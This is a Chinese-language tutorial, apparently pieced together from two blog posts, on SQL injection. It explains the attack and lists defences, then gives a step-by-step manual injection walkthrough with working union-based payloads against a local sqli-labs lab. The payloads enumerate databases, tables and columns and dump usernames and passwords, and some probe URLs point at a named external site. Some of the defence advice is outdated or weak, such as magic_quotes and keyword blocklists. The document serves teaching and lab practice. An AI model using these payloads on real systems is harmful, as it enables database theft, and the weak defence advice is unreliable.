我们围绕以下几个方面来看这个问题:
1.什么是sql注入?
2.为什么要sql注入?
3.怎样sql注入?
1.什么是sql注入?
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生sql注入。 黑客通过SQL注入攻击可以拿到网站数据库的访问权限,之后他们就可以拿到网站数据库中所有的数据,恶意的黑客可以通过SQL注入功能篡改数据库中的数据甚至会把数据库中的数据毁坏掉。做为网络开发者的你对这种黑客行为恨之入骨,当然也有必要了解一下SQL注入这种功能方式的原理并学会如何通过代码来保护自己的网站数据库
sql注入原理:
下面我们来说一下sql注入原理,以使读者对sql注入攻击有一个感性的认识,至于其他攻击,原理是一致的。
SQL注射能使攻击者绕过认证机制,完全控制远程服务器上的数据库。 SQL是结构化查询语言的简称,它是访问数据库的事实标准。目前,大多数Web应用都使用SQL数据库来存放应用程序的数据。几乎所有的Web应用在后台 都使用某种SQL数据库。跟大多数语言一样,SQL语法允许数据库命令和用户数据混杂在一起的。如果开发人员不细心的话,用户数据就有可能被解释成命令, 这样的话,远程用户就不仅能向Web应用输入数据,而且还可以在数据库上执行任意命令了。
SQL注入式攻击的主要形式有两种:
一是直接将代码插入到与SQL命令串联在一起并使得其以执行的用户输入变量。上面笔者举的例子就是采用了这种方法。由于其直接与SQL语句捆绑,故也被称为直接注入式攻击法。
二是一种间接的攻击方法,它将恶意代码注入要在表中存储或者作为原书据存储的字符串。在存储的字符串中会连接到一个动态的SQL命令中,以执行一些恶意的SQL代码。注入过程的工作方式是提前终止文本字符串,然后追加一个新的命令。如以直接注入式攻击为例。就是在用户输入变量的时候,先用一个分号结束当前的语句。然后再插入一个恶意SQL语句即可。由于插入的命令可能在执行前追加其他字符串,因此攻击者常常用注释标记“—”来终止注入的字符串。执行时,系统会认为此后语句位注释,故后续的文本将被忽略,不背编译与执行。
2.为什么要sql注入?
SQL注入产生的原因:程序开发过程中不注意规范书写sql语句和对特殊字符进行过滤,导致客户端可以通过全局变量POST和GET提交一些sql语句正常执行。
防止SQL注入:
1、开启配置文件中的magic_quotes_gpc和magic_quotes_runtime设置
2、执行sql语句时使用addslashes进行sql语句转换
3、Sql语句书写尽量不要省略小引号和单引号
4、过滤掉sql语句中的一些关键字:update、insert、delete、select、*
5、提高数据库表和字段的命名技巧,对一些重要的字段根据程序的特点命名,取不易被猜到的。
6、Php配置文件中设置register_globals为off,关闭全局变量注册
7、控制错误信息,不要再浏览器上输出错误信息,将错误信息写到日志文件中。
如何进行防SQL注入?
1、过滤掉一些常见的数据库操作关键字:select,insert,update,delete,and,*等
或者通过系统函数:addslashes(需要被过滤的内容)来进行过滤
2、在PHP配置文件中Register_globals=off;设置为关闭状态 //作用将注册全局变量关闭。
比如:接收POST表单的值使用$_POST[‘user‘],如果将register_globals=on;直接使用$user可以接收表单的值。
3、SQL语句书写的时候尽量不要省略小引号(tab键上面那个)和单引号
4、提高数据库命名技巧,对于一些重要的字段根据程序的特点命名,取不易被猜到的
5、对于常用的方法加以封装,避免直接暴漏SQL语句
6、开启PHP安全模式Safe_mode=on;
7、打开magic_quotes_gpc来防止SQL注入Magic_quotes_gpc=off;默认是关闭的,它打开后将自动把用户提交的sql语句的查询进行转换,把‘转为‘,这对防止sql注入有重大作用。
因此开启:magic_quotes_gpc=on;
8、控制错误信息
关闭错误提示信息,将错误信息写到系统日志。
9、使用mysqli或pdo预处理。
一句话总结,看程序员把这些改规范的规范掉了,就是见缝插针。
3.怎样sql注入?
为了更直观的让大家了解到sql注入的原理,贴上一张sql注入攻击示意图
●SQL注入威胁表现形式可以体现为以下几点:
●绕过认证,获得非法权限
●猜解后台数据库全部的信息
●注入可以借助数据库的存储过程进行提权等操作
●SQL注入攻击的典型手段
●判断应用程序是否存在注入漏洞
●收集信息、并判断数据库类型
●根据注入参数类型,重构SQL语句的原貌
●猜解表名、字段名
●获取账户信息、攻击web或为下一步攻击做准备
二、SQL注入的简单例子
1.SQL注入漏洞的几种判断方法
①http://www.heetian.com/showtail.asp?id=40‘
②http://www.heetian.com/showtail.asp?id=40 and 1=1
③http://www.heetian.com/showtail.asp?id=40 and 1=2
如果执行①后,页面上提示报错或者提示数据库错误的话,说明是存在注入漏洞的。
如果执行②后,页面正常显示,而执行③后,页面报错,那么说明这个页面是存在注入漏洞的。
因为正确的链接:http://www.heetian.com/showtail.asp?id=40没有问题,如果如果执行①后,页面上提示报错或者提示数据库错误的话说明是不满足条件,说明查询的条件不满足,是有一个查询语句的,明是存在注入漏洞,如果执行②后,页面正常显示,而执行③后,页面报错,那么说明这个页面是存在注入漏洞的。
2.收集信息、判断数据库类型
从其返回的信息中可以判断下数据库的类型,更多可能可以知道部分数据库中的字段以及其他有用信息,为下一步攻击提供铺垫。
3.根据注入参数类型,重构SQL语句的原貌
①ID=40 这类注入的参数是数字型,那么SQL语句的原貌大致是:Select*from 表名 where 字段=40
②name=电影 这类注入的参数是字符型,SQL语句原貌大致是:Select*from 表名 where 字段=‘电影’
③搜索时没有过滤参数的,如keyword=关键字,SQL语句原貌大致是:Select*from 表名 where 字段 like ‘%关键字%’
4.猜解表名、字段名(直接将SQL语句添加到URL后)
①and exists(select*from 表名)
如果页面没有任何变化,说明附加条件成立,那么就是说明猜解的表名正确,反之,就是不存在这个表,接下来就继续猜解,知道正确
②and exists(select 字段 from 表名)
方法原理同上
③猜解字段内容(利用以上猜解出的表名和字段名 方法较古老且麻烦)
●猜解字段内容的长度
(select top 1 len(字段名)from 表名)>0 直至猜解到>n不成立的时候,得出字段的长度为:n 1。
●得到长度后,猜解具体的内容
(select top 1 asc(mid(username,1,1))from 表名)>0直到>m不成立时,就可以猜解出ASCII码值了。
当然我们猜猜表明猜字段还有其他的方法,下一遍我就用其他的方法给大家演示一下。
前言
这篇文章就是一个最基本的SQl手工注入的过程了。基本上在sqlilabs上面的实验,如果知道了其中的全部知识点,都可以通过以下的步骤进行脱裤。下面的这个步骤也是其他的脱裤手段的基础。如果想要精通SQL注入,那么这个最基本的脱裤步骤是必须了解和掌握的。
为了方便说明,我们还是用之前的数字型的注入点为例来进行说明。
整体步骤:
1. 判断是不是注入点
2.得到字段总数
3.得到显示位
4.查选库
5.查选表名
6.查选列名
7.脱裤(就是得到我们想得到列名的值)
1. 判断是不是注入点
SQL注入漏洞的几种判断方法
①http://localhost/sqlilabs/Less-2/?id=1id‘
②http://localhost/sqlilabs/Less-2/?id=1id and 1=1
③http://localhost/sqlilabs/Less-2/?id=1id and 1=2
如果执行①后,页面上提示报错或者提示数据库错误的话,说明是存在注入漏洞的。
如果执行②后,页面正常显示,而执行③后,页面报错,那么说明这个页面是存在注入漏洞的。
就说明http://localhost/sqlilabs/Less-2/?id=1id
2.得到字段总数
后台的SQL语句的写法大致为:
select username,password,[....] from table where id=userinput
那么我们通过使用order by
的语句来判断select
所查询字段的数目。
那么payload变为:
http://localhost/sqlilabs/Less-2/?id=1 order by 1/2/3/4....
当使用order by 4
时程序出错,那么select
的字段一共是3个。
3.得到显示位
在页面上会显示从select
中选取的字段,我们接下来就是要判断显示的字段是哪几个字段。
使用如下的payload(两者均可)进行判断。
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,3 http://localhost/sqlilabs/Less-2/?id=1 and 1=2 union select 1,2,3
当使用个如上的payload时,页面的显示如下:
通过如上的页面显示就可以知道,页面中显示的是第2位和第3位的信息。
4.查选库
在知道了显示位之后,那么接下来就可以通过显示位来显示我们想知道的信息,如数据库的版本,用户信息等等。那么我们使用如下的payload就可以知道相关的信息。
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,version(),database()
此时页面的显示为:
那么接下来我们通过这种方式知道数据库中所有的数据库的名称。
payload如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 0,1 #得到第一个库名 http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 1,1 #得到第二个库名 ...
5.查选表名
由于database()
返回的就是当前web程序所使用的数据库名,那么我们就利用database()
来查询所有的表信息。当然在上一步中。我们也已经知道当前的database
就是security
。
那么我们构造的payload如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
这样我们就得到当前数据库下所有的表名了。页面返回的结果是:
所以我们知道在当前的数据库中存在4张表,分别是emails,referers,uagents,users
。
6.查选列名
在知道了表名之后,接下来我们利用information_schema.columns
就可以根据表名来获取当前表中所有的字段。
payload如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users‘ http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273(users的十六进制)
页面的显示结果如下:
通过这个语句,我们就知道在users表中存在USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,id,name,password
这些字段。但是我本地测试的测试的时候,这个存在一个问题,实际上在security数据库的users的表中,只有id,username,password
这3个字段,其他的字段都是其他数据库的中users表的字段名。
通过上面的payload,我们也同样可以知道在emails,referers,uagents
中的字段名称。
但是有的时候后台的代码可能仅用了使用where
子句,那么这个时候就无法通过information_schema.coumns
来得到列名了,这个时候只能够根据你自己多年的黑客经验来进行猜解了。猜解的方法也是比较的简单,使用exists子句就可以进行猜解了。假设在我们已经知道了表名的情况下(当然猜解表名也使用通过exists子句来完成)。
猜解的语句如下:
http://localhost/sqlilabs/Less-2/?id=1 and exists(select uname from users)
主要的语句就是exists(select 需要猜解的列名 from users)
这种句式。如果在users表中不存在uname
列名,则页面不会显示内容或者是直接出现sql的错误语句。
如下如所示:
下面这个就是猜解到了users表中存在的字段。
http://localhost/sqlilabs/Less-2/?id=1 and exists(select username from users)
猜测在users表中存在username
列,上面的语句程序可以正常第返回结果,那么寿命在users表中确实存在username
列名。
7.脱裤(就是得到我们想得到列名的值)
在知道了当前数据库所有的表名和字段名之后,接下来我们就可以dump数据库中所有的信息了。比如我们下载当前users表中所有的数据。
可以使用如下的payload:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username,password),3 from users
就可以得到users表中所有的username
和password
的数据了,通过这种方式也能够得到其他表中的数据了。
总结:这就是sql注入的原理,但是你必须知道:
1.mysql的系统函数
2.了解下union
3.order by 用于对结果集进行排序
4.mysql数据库重要四个数据库库:information_schema proformation_schema mysql test
5.三个重要数据表:table_name table_schema table_type
6.理解schema,schemata,schema_name,table_schema的含义很重要!很重要!很重要!(说三遍~)
这些我会在下来写一下。